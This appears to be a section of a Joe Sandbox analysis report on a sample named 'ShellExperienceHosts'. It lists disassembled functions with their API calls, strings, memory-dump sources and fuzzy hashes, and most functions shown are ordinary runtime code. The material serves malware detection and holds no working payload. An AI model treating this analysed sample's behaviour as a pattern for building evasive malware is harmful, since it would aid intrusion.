                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: IconicWindow$ForegroundMessagePostShow
                                                                            • String ID:
                                                                            • API String ID: 675533722-0
                                                                            • Opcode ID: a55be4490ee1723b9e329fb2345719bc63434dade34ee2f8577dd8ce64c0cbfd
                                                                            • Instruction ID: 4c0102517a7668a7c19dab929cdfaa91d6f7ab63fd307c79a9b093d18941f5eb
                                                                            • Opcode Fuzzy Hash: a55be4490ee1723b9e329fb2345719bc63434dade34ee2f8577dd8ce64c0cbfd
                                                                            • Instruction Fuzzy Hash: 330196327005117BDE251764DC1CE693B36EB89765B200229F9169AAD0DF219C11CB94
                                                                            Function 6C6E2FB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,00000000,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E2FCA
                                                                            • GetLastError.KERNEL32(?,00000000,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E3001
                                                                              • Part of subcall function 6C6E328C: GetModuleFileNameW.KERNEL32(?,?,00000105,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017), ref: 6C6E333C
                                                                              • Part of subcall function 6C6E328C: SetLastError.KERNEL32(0000006F,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E3350
                                                                            Strings
                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 6C6E2FC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$DebugFileModuleNameOutputString
                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                            • API String ID: 3265401609-2690750368
                                                                            • Opcode ID: d1073161be5260dda8ecb106215a217b697dfc982e86124e7bc97d4f9bc1bcea
                                                                            • Instruction ID: 462ffe933a81dbed30d1c4c88a48d741adb1aaf2132996d49ba9115df1a46b13
                                                                            • Opcode Fuzzy Hash: d1073161be5260dda8ecb106215a217b697dfc982e86124e7bc97d4f9bc1bcea
                                                                            • Instruction Fuzzy Hash: 41F04C3170F122474F744AA2A9449AA77B9871F78C7240537F811C3D20EB20C880CBEC
                                                                            Function 031A689F Relevance: 4.9, APIs: 3, Instructions: 410COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Xinvalid_argumentstd::_swprintf
                                                                            • String ID:
                                                                            • API String ID: 2109912724-0
                                                                            • Opcode ID: fb3159d5d0cc833ea859812a30b47ed7f5190ad94b9111cceee841ddcb571069
                                                                            • Instruction ID: 1913493a21cefbc26cfaa778b1ebd3d955f72ff48cb1dd5a0aec4d64815798c9
                                                                            • Opcode Fuzzy Hash: fb3159d5d0cc833ea859812a30b47ed7f5190ad94b9111cceee841ddcb571069
                                                                            • Instruction Fuzzy Hash: 72E16675F006259FDF64DE68CC90BEEB3B5EB49301F1845E9D94AA7284D730AE818F90
                                                                            Function 031A00CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l$ntdl
                                                                            • API String ID: 0-924918826
                                                                            • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                            • Instruction ID: fb6f7d32ebc5247b6ed52cae9a0725f7d04ecac94bbc9990a2a6d2f6b77daa26
                                                                            • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                            • Instruction Fuzzy Hash: A921DFB9A00A209FCB29DF18859862FBBB6EF4D76271580A9E405DF354EB34C90297D1
                                                                            Function 6C6CC9CA Relevance: 2.2, APIs: 1, Instructions: 709COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: e3df414e04acb77b8f8238edf6b2304ea9505d986fa485402ed2fcad15157fd9
                                                                            • Instruction ID: e015f25fd01e3fdc6548de8e2a5a1846fe6e0fb7606030f0a5598e2a0df900bb
                                                                            • Opcode Fuzzy Hash: e3df414e04acb77b8f8238edf6b2304ea9505d986fa485402ed2fcad15157fd9
                                                                            • Instruction Fuzzy Hash: 0E4206B2F011589FCB04CFACD8806DDBBB6EF99318F294129E415B7740D7749845CB9A
                                                                            Function 6C6C699E Relevance: 2.0, Strings: 1, Instructions: 733COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • 0123456789ABCDEFabcdef-+Xx, xrefs: 6C6C6A2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                            • API String ID: 593203224-2799312399
                                                                            • Opcode ID: 14d9b767fc295ef8445d4a32bce66b29bc4723ac604c1346e000aa2766d2e63f
                                                                            • Instruction ID: d52205729ebd587e454a1e7d4590680f1a758e09a7b281294c0f9e91232149cf
                                                                            • Opcode Fuzzy Hash: 14d9b767fc295ef8445d4a32bce66b29bc4723ac604c1346e000aa2766d2e63f
                                                                            • Instruction Fuzzy Hash: 2D52C370B052889FDB05CF68C4507EDBBB2EF46318F288259D465ABB81C731D946CB9E
                                                                            Function 02240CB5 Relevance: 1.8, Strings: 1, Instructions: 517COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: cca1051eebb1169d587f4373fdd59888663e8c0004b99c560278c0417d3c94b7
                                                                            • Instruction ID: 92d736341fdfefe1520dc9386904af9f0a0b5c0dd8621808b0ecc1f50123a32a
                                                                            • Opcode Fuzzy Hash: cca1051eebb1169d587f4373fdd59888663e8c0004b99c560278c0417d3c94b7
                                                                            • Instruction Fuzzy Hash: 5112BD72E206198BDF0CCFA8D8407ECB7B2FBC8324F158669D916B7294CB756A45CB50
                                                                            Function 10010CDE Relevance: 1.8, Strings: 1, Instructions: 517COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: c394c455a7f2bff056411643fe4383718cef374654397aa3c9f531cf96a384d0
                                                                            • Instruction ID: 047c6c88f323fc5ab06c460dd6f244dd892c11a6ec1a435fe2328daaef5e84d1
                                                                            • Opcode Fuzzy Hash: c394c455a7f2bff056411643fe4383718cef374654397aa3c9f531cf96a384d0
                                                                            • Instruction Fuzzy Hash: 5212B872E105198BDF18CFA8D8406ECB7B2FB8C324F25866DD961FB294C7B1A945CB50
                                                                            Function 100024B0 Relevance: 1.7, Strings: 1, Instructions: 479COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [RO] %ld bytes
                                                                            • API String ID: 0-772938740
                                                                            • Opcode ID: 2a08ef20fd28d4e41efb5c589b023e79d3b49b63dd55763adb9396416b1eb817
                                                                            • Instruction ID: 5f4ed6025b2df33ffe26fbfa09f8a844b0b9df8eef521221cbe303e0c6286253
                                                                            • Opcode Fuzzy Hash: 2a08ef20fd28d4e41efb5c589b023e79d3b49b63dd55763adb9396416b1eb817
                                                                            • Instruction Fuzzy Hash: 07222774A00B05DFEB64CF68C984A9ABBF1FF48344F208A6DD95A97759D730E881CB50
                                                                            Function 6C6F0BFE Relevance: 1.5, APIs: 1, Instructions: 27windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Iconic
                                                                            • String ID:
                                                                            • API String ID: 110040809-0
                                                                            • Opcode ID: e2c4ded0c280adb0d356b4f80c7ff7a219e1f024b19f09cfcaf442ddebf4c313
                                                                            • Instruction ID: 144f2274777b5717ae5fe4aa65f67fc9c7be41060818e2866ecfb4bcc4c624f6
                                                                            • Opcode Fuzzy Hash: e2c4ded0c280adb0d356b4f80c7ff7a219e1f024b19f09cfcaf442ddebf4c313
                                                                            • Instruction Fuzzy Hash: E0E026333640112FE6085A39ED4CBBA63A9FB81216F10093DE0A7C3ED0DF50AC0AC360
                                                                            Function 031A82BF Relevance: .6, Instructions: 608COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfce4a1a5e8fd92abbba4c6a44f6adf7b218211a2e35efd4732c1bdd9f67e9cb
                                                                            • Instruction ID: 09532438ba10e7617217de39516c4a61b438b244b38913d2dc1d867769fa7819
                                                                            • Opcode Fuzzy Hash: dfce4a1a5e8fd92abbba4c6a44f6adf7b218211a2e35efd4732c1bdd9f67e9cb
                                                                            • Instruction Fuzzy Hash: F1226277E5161A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE78BA478BC0
                                                                            Function 02232487 Relevance: .5, Instructions: 479COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c01553f6f512b2846d959305e748f2a9f08dd86951aa6911af8f98a71cd808d6
                                                                            • Instruction ID: 1fbda720ec1ede8368fdaf301ed13ba8313efac2c07f57068fc8095178a0a154
                                                                            • Opcode Fuzzy Hash: c01553f6f512b2846d959305e748f2a9f08dd86951aa6911af8f98a71cd808d6
                                                                            • Instruction Fuzzy Hash: 602248B0A10B06CFD729CFA9C584A9ABBF1FF48304F248A6DD85A97755D330E981CB50
                                                                            Function 031A1E6F Relevance: .5, Instructions: 479COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0310cf5ebc2e2a90283327764d4546fd3d9aec9e33a65a2a1938e8938fd551d8
                                                                            • Instruction ID: 46aba43d61a3401ed6b931d652764705ff9eae85ee7bc98b977ef39eed3baf7b
                                                                            • Opcode Fuzzy Hash: 0310cf5ebc2e2a90283327764d4546fd3d9aec9e33a65a2a1938e8938fd551d8
                                                                            • Instruction Fuzzy Hash: 1B2227B8A00B059FD728CF69C580AAABBF1FF4C305F148A6DD95A97755D330E885CB50
                                                                            Function 6C854B74 Relevance: .2, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd1aac542edc429d71cb518c643d948f271d959a540291e137b2a1eb494a4d59
                                                                            • Instruction ID: 2b292d67738a661b41edc23555cb399273e1fd13aa35a07526957213b8421849
                                                                            • Opcode Fuzzy Hash: dd1aac542edc429d71cb518c643d948f271d959a540291e137b2a1eb494a4d59
                                                                            • Instruction Fuzzy Hash: 44519C72D00119AFDF14CF99C940AEEBBB6EFC8304F5984A8E914AB201D7749A60CB90
                                                                            Function 02230AE4 Relevance: .1, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                            • Instruction ID: 55fd0432218e3e8e5a8d35ee1a317f7b7b2d6b4a5daaba662217c7270f0e7f38
                                                                            • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                            • Instruction Fuzzy Hash: B331A1B5A143478FC311DF58C480966B7E5FF89318F09056DE88587316E370FA55CBA1
                                                                            Function 6C84CF40 Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction ID: 92efcbf5f5fdfc1d983a4a304e39de60a311e0208767d66b21af1e5acc1e87b6
                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction Fuzzy Hash: DC119EB724204947D6509F3EC6B46B7E39DEBC532CB38CF76E0528BE56D2AB900C9500
                                                                            Function 6C6E0A1E Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 43registryclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegisterClipboardFormatW.USER32(Native), ref: 6C75D780
                                                                            • RegisterClipboardFormatW.USER32(OwnerLink), ref: 6C75D78D
                                                                            • RegisterClipboardFormatW.USER32(ObjectLink), ref: 6C75D79B
                                                                            • RegisterClipboardFormatW.USER32(Embedded Object), ref: 6C75D7A9
                                                                            • RegisterClipboardFormatW.USER32(Embed Source), ref: 6C75D7B7
                                                                            • RegisterClipboardFormatW.USER32(Link Source), ref: 6C75D7C5
                                                                            • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 6C75D7D3
                                                                            • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 6C75D7E1
                                                                            • RegisterClipboardFormatW.USER32(FileName), ref: 6C75D7EF
                                                                            • RegisterClipboardFormatW.USER32(FileNameW), ref: 6C75D7FD
                                                                            • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 6C75D80B
                                                                            • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 6C75D819
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister
                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                            • API String ID: 1228543026-2889995556
                                                                            • Opcode ID: b82d44454dff37c31761afe61ffb8620e67b66d3d4404d5f1e0800e90a3dffe9
                                                                            • Instruction ID: e0831267d9d4c221a948331e6f47f8d8167e47849d24908b75adc24e80f3bd6e
                                                                            • Opcode Fuzzy Hash: b82d44454dff37c31761afe61ffb8620e67b66d3d4404d5f1e0800e90a3dffe9
                                                                            • Instruction Fuzzy Hash: 2C114A71E527209FCB305FB19A4C4067BB0AA0661B3408D6EA15B97A00D738E844DF96
                                                                            Function 10009AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ACE
                                                                            • __mtterm.LIBCMT ref: 10009ADA
                                                                              • Part of subcall function 100097A5: DecodePointer.KERNEL32(00000008,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097B6
                                                                              • Part of subcall function 100097A5: TlsFree.KERNEL32(00000021,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 100097D0
                                                                              • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C031
                                                                              • Part of subcall function 100097A5: _free.LIBCMT ref: 1000C034
                                                                              • Part of subcall function 100097A5: DeleteCriticalSection.KERNEL32(00000021,?,?,100076A5,1000768B,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 1000C05B
                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009AF0
                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009AFD
                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009B0A
                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009B17
                                                                            • TlsAlloc.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B67
                                                                            • TlsSetValue.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B82
                                                                            • __init_pointers.LIBCMT ref: 10009B8C
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009B9D
